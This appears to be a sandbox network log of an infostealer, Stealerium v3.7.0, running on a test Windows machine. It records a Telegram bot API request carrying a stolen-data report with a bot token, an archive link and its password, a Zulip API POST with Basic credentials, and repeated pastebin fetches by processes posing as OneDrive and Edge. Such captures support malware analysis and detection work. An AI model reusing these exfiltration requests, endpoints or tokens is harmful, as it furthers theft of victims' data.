0%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks%3A%205%0A%0A%2ASOFTWARE%20%26%20ACCOUNTS%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%0A%2ADEVICE%20INFORMATION%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%20%20%20%E2%88%9F%20%F0%9F%94%91%20Windows%20Key%0A%20%20%20%E2%88%9F%20%F0%9F%96%BC%EF%B8%8F%20Desktop%20Shot%0A%0A%2AINSTALLATION%20STATUS%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%20%20%20%E2%88%9F%20%E2%9B%94%20Startup%3A%20Disabled%0A%20%20%20%E2%88%9F%20%E2%9B%94%20Clipper%3A%20Inactive%0A%20%20%20%E2%88%9F%20%E2%9B%94%20Keylogger%3A%20Stopped%0A%0A%2AFILE%20GRABBER%2A%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images%3A%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents%3A%208%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files%3A%201%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Source%20code%20files%3A%202%0A%0A%F0%9F%94%97%20%5BArchive%20download%20link%5D%28https%3A%2F%2Fgofile.io%2Fd%2FPsXhsW%29%0A%F0%9F%94%90%20Archive%20password%20is%3A%20%22e85b2d326d1a9ec83b3bf33ca9965d6a%22%0A%0A%20Join%20https%3A%2F%2Ft.me%2FStealeriumm%60%60%60&parse_mode=Markdown&disable_web_page_preview=True

update.dotnet.exe

Remote address:

149.154.167.220:443

Request

GET /bot7204924753:AAFaqmmBR9ybp4-iE8BA2YCiFNUbOEd0Ljk/sendMessage?chat_id=8169552647&text=%60%60%60%0A%F0%9F%94%8D%20%2ASTEALERIUM%20v3.7.0%20REPORT%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%F0%9F%93%85%20Date%3A%202025-01-11%2010%3A46%3A31%20AM%0A%F0%9F%96%A5%EF%B8%8F%20System%3A%20Microsoft%20Windows%2010%20Enterprise%20LTSC%20%2864%20Bit%29%0A%F0%9F%91%A4%20Username%3A%20Admin%0A%F0%9F%92%BB%20CompName%3A%20HWXICMBQ%0A%F0%9F%8C%90%20Language%3A%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0A%F0%9F%9B%A1%EF%B8%8F%20Antivirus%3A%20Windows%20Defender%0A%0A%2AHARDWARE%20INFORMATION%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%E2%9A%A1%20CPU%3A%2012th%20Gen%20Intel%28R%29%20Core%28TM%29%20i5-12400%0A%F0%9F%8E%AE%20GPU%3A%20Microsoft%20Basic%20Display%20Adapter%0A%F0%9F%93%8A%20RAM%3A%2016157MB%0A%F0%9F%94%8B%20Power%3A%20NoSystemBattery%20%28100%25%29%0A%F0%9F%93%BA%20Screen%3A%201280x720%0A%F0%9F%93%B7%20Webcams%3A%200%0A%0A%2ANETWORK%20INFORMATION%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%F0%9F%8C%90%20Gateway%20IP%3A%2010.127.0.1%0A%F0%9F%94%92%20Internal%20IP%3A%2010.127.0.225%0A%F0%9F%8C%8D%20External%20IP%3A%20181.215.176.83%0A%0A%2ADETECTED%20DOMAINS%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%20%20%20-%20%F0%9F%8F%A6%20Banking%20Services%20%28No%20data%29%0A%20%20%20-%20%F0%9F%92%B0%20Crypto%20Services%20%28No%20data%29%0A%20%20%20-%20%F0%9F%94%9E%20Adult%20Websites%20%28No%20data%29%0A%0A%2ABROWSER%20DATA%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks%3A%205%0A%0A%2ASOFTWARE%20%26%20ACCOUNTS%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%0A%2ADEVICE%20INFORMATION%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%20%20%20%E2%88%9F%20%F0%9F%94%91%20Windows%20Key%0A%20%20%20%E2%88%9F%20%F0%9F%96%BC%EF%B8%8F%20Desktop%20Shot%0A%0A%2AINSTALLATION%20STATUS%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%20%20%20%E2%88%9F%20%E2%9B%94%20Startup%3A%20Disabled%0A%20%20%20%E2%88%9F%20%E2%9B%94%20Clipper%3A%20Inactive%0A%20%20%20%E2%88%9F%20%E2%9B%94%20Keylogger%3A%20Stopped%0A%0A%2AFILE%20GRABBER%2A%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images%3A%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents%3A%208%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files%3A%201%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Source%20code%20files%3A%202%0A%0A%F0%9F%94%97%20%5BArchive%20download%20link%5D%28https%3A%2F%2Fgofile.io%2Fd%2FPsXhsW%29%0A%F0%9F%94%90%20Archive%20password%20is%3A%20%22e85b2d326d1a9ec83b3bf33ca9965d6a%22%0A%0A%20Join%20https%3A%2F%2Ft.me%2FStealeriumm%60%60%60&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sat, 11 Jan 2025 10:46:58 GMT
Content-Type: application/json
Content-Length: 2953
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

szurubooru.zulipchat.com

update.dotnet.exe

Remote address:

8.8.8.8:53

Request

szurubooru.zulipchat.com

IN A

Response

szurubooru.zulipchat.com

IN A

3.81.156.163

szurubooru.zulipchat.com

IN A

50.17.0.11

szurubooru.zulipchat.com

IN A

35.153.41.95

szurubooru.zulipchat.com

IN A

52.20.41.38

szurubooru.zulipchat.com

IN A

54.198.104.147

szurubooru.zulipchat.com

IN A

44.208.10.127
DNS

szurubooru.zulipchat.com

update.dotnet.exe

Remote address:

8.8.8.8:53

Request

szurubooru.zulipchat.com

IN A

Response

szurubooru.zulipchat.com

IN A

52.20.41.38

szurubooru.zulipchat.com

IN A

50.17.0.11

szurubooru.zulipchat.com

IN A

35.153.41.95

szurubooru.zulipchat.com

IN A

54.198.104.147

szurubooru.zulipchat.com

IN A

44.208.10.127

szurubooru.zulipchat.com

IN A

3.81.156.163
POST

https://szurubooru.zulipchat.com/api/v1/messages

update.dotnet.exe

Remote address:

3.81.156.163:443

Request

POST /api/v1/messages HTTP/1.1
Authorization: Basic c3p1cnVib29ydUBnbWFpbC5jb206Zmd3VDV1bWJyUWRXNlkxYnVJV1pKSzZTMkZWUVpBZVM=
Content-Type: application/x-www-form-urlencoded
Host: szurubooru.zulipchat.com
Content-Length: 3467
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 11 Jan 2025 10:46:59 GMT
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
Server: nginx/1.18.0 (Ubuntu)
Vary: Accept-Encoding
Expires: Sat, 11 Jan 2025 10:46:59 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
Vary: Accept-Language
Content-Language: en
X-RateLimit-Limit: 200
X-RateLimit-Remaining: 173
X-RateLimit-Reset: 1736592479
Strict-Transport-Security: max-age=15768000
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Authorization
Access-Control-Allow-Methods: GET, POST, DELETE, PUT, PATCH, HEAD
DNS

163.156.81.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

163.156.81.3.in-addr.arpa

IN PTR

Response

163.156.81.3.in-addr.arpa

IN PTR

ec2-3-81-156-163 compute-1 amazonawscom
DNS

163.156.81.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

163.156.81.3.in-addr.arpa

IN PTR

Response

163.156.81.3.in-addr.arpa

IN PTR

ec2-3-81-156-163 compute-1 amazonawscom
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: qbcjymZ9ucWBITUcGTJRuOoHDVYGuWdkgQMA1JgcWdfUNgKQkpKdfs0SrQ714vfHlvs7vKMvYq4YYCF5pbnCLk3/wGZr2cN3P4gyZ6RnUA4=$hNyqS8JCxEnQmN63/9lpqA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900453896a5563f1-LHR
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: jb6zm8/fVmDgeWmB1Wq8fWg+hyeRNZbMuHJTMyXOYXIulG4J62A0UPYt6NOGDwxYsSvFRFnCBUPuKezGXBhgSKP1t4URaLENeK5j2/YL7aY=$8CVphyV6x74fAmdJXoME9A==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900453a91b50edf3-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 6944
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: Jo7hbs9PB65sqX0VDi39ZD8uKN77qonIL3WzuZzUU3ndk+DuA+E/uBOXeBh33O1woSEiLZFa6f1Yy2yNj6q8wfiFOLUMZ9ifMp/6P0GdO5E=$Bp5sILGJgcAeHkgXbor6Yw==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900453a8b99a6349-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7008
Connection: close
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
x-content-options: nosniff
x-frame-options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: qzFN47o43ckStcPmHS7L2lr6HlaIxk7eNk++kLLXzohm0fbi5ILa/M/2v4hiXQgED3o+vhs5OSbbCmVx8JS5/YaaRD/IBA3LWYvcAoVblck=$nLaW+leTHf+ZPJtBz0rgWQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900453bf092771f8-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: hCH7hLviqyAUwMjVnhxFbSjS51jUbqR32apz/dqJYfQzjapHsWSKStKV1mCOevZiSWke2Ikas9HstZ7H3hjOCmxWeJxufuiRnXhhs11HU9k=$Rsk8kJanCSaTjeCnai2fZQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900453bc6fd16536-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: dVF4DqAuasYCoTC3RbhGulC8ni/uIMLq7G7A7yhpbx+oHuJCDtMZU9FVHalfpsMd9Qbo8y8DlK+j1jimf18SoforzYgAIvmCOmLcXGFRlLo=$/+VkpgFWyG2sdWwhKZQA7A==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900453c02b11419b-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: iQ/mvConm5WvSm3VKJHTti2TqBONHRk1XP9WORpSubpIFvi6ikDT/AO8/gY6e2GfAvz20A1dtHCm/OKvFCnibhriBW4gr2K60PuNztdlmUw=$STB0UdDUGuu7bAmHuQ0svQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900453d17f37bed5-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: /jQI8XPi7lE69KWReEIpTJ21ZXjO4gZ4HCnKSi7m/cvvGY/GQpLuOwJStm+32zBggiPJruri5Nk2BlhFO8u3Q1ScRHQh5Y4De98G8v03VTs=$eVUJCQ4SgDvAm7IEiPh+rw==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900453d3cd9c63ef-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
